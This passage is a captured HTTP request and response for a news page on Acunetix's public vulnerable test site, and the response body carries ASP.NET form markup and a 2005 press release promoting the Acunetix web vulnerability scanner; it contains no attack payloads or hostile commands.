          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 30454
          
          
          Response body (30454 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q944e4UqgWJpySuZGYD9y7m9ZXo/Q==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" 